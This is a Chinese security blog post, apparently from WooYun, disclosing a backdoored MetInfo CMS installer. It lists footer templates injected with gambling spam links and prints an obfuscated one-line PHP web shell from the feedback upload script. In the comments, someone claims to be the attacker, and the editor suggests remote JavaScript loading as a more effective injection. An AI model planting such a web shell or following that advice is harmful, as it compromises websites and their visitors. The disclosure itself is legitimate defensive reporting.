MetInfo(米拓)企业网站管理系被插后门

关于“MetInfo(米拓)企业网站管理系统”

MetInfo企业网站管理系统采用PHP+Mysql架构,全站内置了SEO搜索引擎优化机制,支持用户自定义界面语言(全球各种语言),拥有企业网站常用的模块功能(企业简介模块、新闻模块、产品模块、下载模块、图片模块、招聘模块、在线留言、反馈系统、在线交流、友情链接、网站地图、会员与权限管理)。强大灵活的后台管理功能、静态页面生成功能、个性化模块添加功能、不同栏目自定义FLASH样式功能等可为企业打造出大气漂亮且具有营销力的精品网站。

官方网站:http://www.metinfo.cn/

后门文件分析

经过我们分析,在MetInfo安装文件包里的文件做了如下修改:

1、在多个html文件里植入了“黑链”代码。

包括如下文件及对应恶意代码:

/templates/metv4/foot.html 第17行被植入如下代码:
[php]

[/php]
/templates/metv2/foot.html 第10行被植入如下代码:
[php]

[/php]
/templates/metv5s/foot.html 第13行被植入如下代码:
[php]

[/php]
/templates/default/foot.html 第13行被植入如下代码:
[php]

[/php]
/tmp1/templates/metv3/foot.html 第7行被植入如下代码:
[php]
皇冠网百家乐博彩通

[/php]
/tmp1/templates/met007/foot.html 第19行被植入如下代码:
[php]
皇冠网百家乐博彩通

[/php]
2、网站木马后门代码植入。

位于/feedback/uploadfile_save.php 第7行被植入了如下后门代码:
[php]
if(isset($_REQUEST['[马赛克]'])){$a = str_replace(x,"","axsxxsxexrxxt");$a($_REQUEST["[马赛克]"]);}
[/php]
from:zone.wooyun.org

4 条评论

  1. scanv

    这个是scanv团队发现的吧

    1. 0day5
      @scanv

      scanv的大牛们,这个是小编在乌云社区看到的。至于来处还真不知道是您们找到的。

  2. 皇冠网

    真JB有心情,我昨天插的,今天你就查出来了!

    1. 0day5
      @皇冠网

      咳咳咳~大牛您真厉害,只是用法错了。你不加黑链,而是使用远程JS加载应该效果更好

发表评论